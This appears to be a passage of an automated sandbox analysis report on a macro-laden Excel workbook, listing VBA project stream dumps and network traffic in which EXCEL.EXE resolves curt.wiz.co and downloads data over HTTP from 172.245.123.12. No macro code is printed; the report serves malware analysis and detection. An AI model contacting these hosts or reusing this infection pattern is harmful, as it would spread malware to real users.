          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . } . . . m v v . i J , . i X ! . N > B = u . ~ G / . . . . . . . . . . t . . . . \\ . p . N 6 P . D J S 6 j b | | > } S - . . j ' 8 . 0 O g / # . ^ h c O ` k . C f n / . 3 _ . . . + G . v o . E _ 0 t D j : / B . . . n a . . . . . . . = . . . x F Q . . . . S } 4 . . 8 . X . . . . A . . . . . . . . . " . . . . = . . . 1 . . . . = . . . 4 . E . m @ . . . x . . . 3 " . . . S . . . . . ~ . . . . . . { . 1 . . . . * . d + . 3 f # ? " 5 s # v N . 1 . . . G .
          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 de 86 95 1f 7d 15 00 db e7 01 c7 6d 76 c6 76 19 e3 69 b3 84 bd 4a 2c a8 1c bf 69 58 c0 f1 98 21 1a 4e d9 fd 3e e4 42 3d b4 ce 75 00 bb 7e 47 2f 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 74 00 e2 00 00 00 5c 00 70 00 4e 36 50 03 9f a8 e0 44 be 4a 53 fa 80 36 6a 62 7c 7c c8 3e a3 7d c3 53 bd c8
          General
          Stream Path:_VBA_PROJECT_CUR/PROJECT
          CLSID:
          File Type:ASCII text, with CRLF line terminators
          Stream Size:527
          Entropy:5.279649998615774
          Base64 Encoded:True
          Data ASCII:I D = " { 5 2 B 6 0 E C 6 - 0 9 9 E - 4 D 8 C - 8 A 5 B - B 7 8 B 7 D 3 C E C 8 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B F B D A 1 A E 6 3 5 6 D C 5 A D
          Data Raw:49 44 3d 22 7b 35 32 42 36 30 45 43 36 2d 30 39 39 45 2d 34 44 38 43 2d 38 41 35 42 2d 42 37 38 42 37 44 33 43 45 43 38 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
          General
          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
          CLSID:
          File Type:data
          Stream Size:104
          Entropy:3.0488640812019017
          Base64 Encoded:False
          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
          CLSID:
          File Type:data
          Stream Size:2644
          Entropy:3.982462153871729
          Base64 Encoded:True
          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
          Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
          TimestampSource PortDest PortSource IPDest IP
          Dec 16, 2024 17:18:47.365801096 CET49826443192.168.2.5170.82.174.30
          Dec 16, 2024 17:18:47.365858078 CET44349826170.82.174.30192.168.2.5
          Dec 16, 2024 17:18:47.365933895 CET49826443192.168.2.5170.82.174.30
          Dec 16, 2024 17:18:47.366259098 CET49826443192.168.2.5170.82.174.30
          Dec 16, 2024 17:18:47.366271973 CET44349826170.82.174.30192.168.2.5
          Dec 16, 2024 17:18:48.820128918 CET44349826170.82.174.30192.168.2.5
          Dec 16, 2024 17:18:48.820225954 CET49826443192.168.2.5170.82.174.30
          Dec 16, 2024 17:18:48.881803036 CET49826443192.168.2.5170.82.174.30
          Dec 16, 2024 17:18:48.881834984 CET44349826170.82.174.30192.168.2.5
          Dec 16, 2024 17:18:48.882141113 CET44349826170.82.174.30192.168.2.5
          Dec 16, 2024 17:18:48.882193089 CET49826443192.168.2.5170.82.174.30
          Dec 16, 2024 17:18:48.891490936 CET49826443192.168.2.5170.82.174.30
          Dec 16, 2024 17:18:48.939327002 CET44349826170.82.174.30192.168.2.5
          Dec 16, 2024 17:18:50.123029947 CET44349826170.82.174.30192.168.2.5
          Dec 16, 2024 17:18:50.123155117 CET44349826170.82.174.30192.168.2.5
          Dec 16, 2024 17:18:50.123151064 CET49826443192.168.2.5170.82.174.30
          Dec 16, 2024 17:18:50.123217106 CET49826443192.168.2.5170.82.174.30
          Dec 16, 2024 17:18:50.134285927 CET49826443192.168.2.5170.82.174.30
          Dec 16, 2024 17:18:50.134330988 CET44349826170.82.174.30192.168.2.5
          Dec 16, 2024 17:18:50.136138916 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:50.255995989 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:50.256160975 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:50.256406069 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:50.376257896 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.386105061 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.386208057 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.386223078 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.386241913 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.386276960 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.386295080 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.386317968 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.386352062 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.386364937 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.386400938 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.386404991 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.386440992 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.386451960 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.386486053 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.386770010 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.386802912 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.386837959 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.386991024 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.506325960 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.506369114 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.506403923 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.506429911 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.510406017 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.510487080 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.578588963 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.578628063 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.578697920 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.578732014 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.580847025 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.580912113 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.581000090 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.581060886 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.589250088 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.589406967 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.589483976 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.589545965 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.597568989 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.597640991 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.597696066 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.597750902 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.606204987 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.606244087 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.606283903 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.606311083 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.614531994 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.614609003 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.614686966 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.614747047 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.622766972 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.622838974 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.622895002 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.622952938 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.631156921 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.631226063 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.631263018 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.631323099 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.639600992 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.639667034 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.639803886 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.639864922 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.648000956 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.648067951 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.648097038 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.648156881 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.655786037 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.655823946 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.655855894 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.655874968 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.663378954 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.663460016 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.770713091 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.770733118 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.770775080 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.770795107 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.772017002 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.772047043 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.772068977 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.772092104 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.776676893 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.776710987 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.776734114 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.776755095 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.781771898 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.781831026 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.782119989 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.782171965 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.786108971 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.786169052 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.786178112 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.786222935 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.790817022 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.790884972 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.791016102 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.791088104 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.795412064 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.795480013 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.795561075 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.795610905 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.799937963 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.800008059 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.800088882 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.800144911 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.804903984 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.804972887 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.804982901 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.805036068 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.811044931 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.811119080 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.811295986 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.811357975 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.813952923 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.813990116 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.814014912 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.814040899 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.818501949 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.818573952 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.818588972 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.818627119 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.823082924 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.823151112 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.823306084 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.823416948 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.827686071 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.827750921 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.828033924 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.828098059 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.832294941 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.832370043 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.832385063 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.832436085 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.837047100 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.837150097 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.837337971 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.837399006 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.841540098 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.841615915 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.841710091 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.841772079 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.846344948 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.846409082 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.846484900 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.846546888 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.950877905 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.950995922 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.962914944 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.962974072 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.962982893 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.963043928 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.964762926 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.964821100 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.964941978 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.964994907 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.968399048 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.968458891 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.968595028 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.968647957 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.974189043 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.974226952 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.974337101 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.974337101 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.976937056 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.976973057 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.977068901 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.977152109 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.980429888 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.980493069 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.980653048 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.980705023 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.983134031 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.983191967 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.983248949 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.983304024 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.986423969 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.986478090 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.986558914 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.986609936 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.990052938 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.990111113 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.990163088 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.990233898 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.993501902 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.993599892 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.993666887 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.993721962 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.997067928 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.997128963 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:51.997131109 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:51.997184038 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.000657082 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.000710964 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.000715017 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.000763893 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.004252911 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.004365921 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.004367113 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.004419088 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.007781982 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.007855892 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.007934093 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.007985115 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.011368036 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.011404037 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.011425972 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.011450052 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.014976978 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.015031099 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.015074015 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.015130997 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.018410921 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.018470049 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.018541098 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.018590927 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.021997929 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.022057056 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.022119999 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.022171974 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.025644064 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.025702953 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.025902987 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.025955915 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.029109001 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.029164076 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.029237986 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.029289961 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.032639027 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.032701015 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.032784939 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.032867908 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.036263943 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.036320925 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.036397934 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.036453009 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.039881945 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.039918900 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.039936066 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.039973021 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.043351889 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.043436050 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.043450117 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.043505907 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.046900988 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.047005892 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.047025919 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.047070026 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.050510883 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.050580025 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.050622940 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.050673962 CET4983380192.168.2.5172.245.123.12
          Dec 16, 2024 17:18:52.053972006 CET8049833172.245.123.12192.168.2.5
          Dec 16, 2024 17:18:52.054044962 CET4983380192.168.2.5172.245.123.12
          TimestampSource PortDest PortSource IPDest IP
          Dec 16, 2024 17:18:47.222970963 CET5298653192.168.2.51.1.1.1
          Dec 16, 2024 17:18:47.361174107 CET53529861.1.1.1192.168.2.5
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Dec 16, 2024 17:18:47.222970963 CET192.168.2.51.1.1.10x12cStandard query (0)curt.wiz.coA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Dec 16, 2024 17:18:02.606384039 CET1.1.1.1192.168.2.50xa3f4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
          Dec 16, 2024 17:18:02.606384039 CET1.1.1.1192.168.2.50xa3f4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
          Dec 16, 2024 17:18:04.650279045 CET1.1.1.1192.168.2.50x91b4No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
          Dec 16, 2024 17:18:04.650279045 CET1.1.1.1192.168.2.50x91b4No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
          Dec 16, 2024 17:18:47.361174107 CET1.1.1.1192.168.2.50x12cNo error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
          Dec 16, 2024 17:18:47.361174107 CET1.1.1.1192.168.2.50x12cNo error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
          Dec 16, 2024 17:18:47.361174107 CET1.1.1.1192.168.2.50x12cNo error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
          Dec 16, 2024 17:19:03.489341021 CET1.1.1.1192.168.2.50x9a0fNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
          Dec 16, 2024 17:19:03.489341021 CET1.1.1.1192.168.2.50x9a0fNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
          • curt.wiz.co
          • 172.245.123.12
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.549833172.245.123.12807600C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
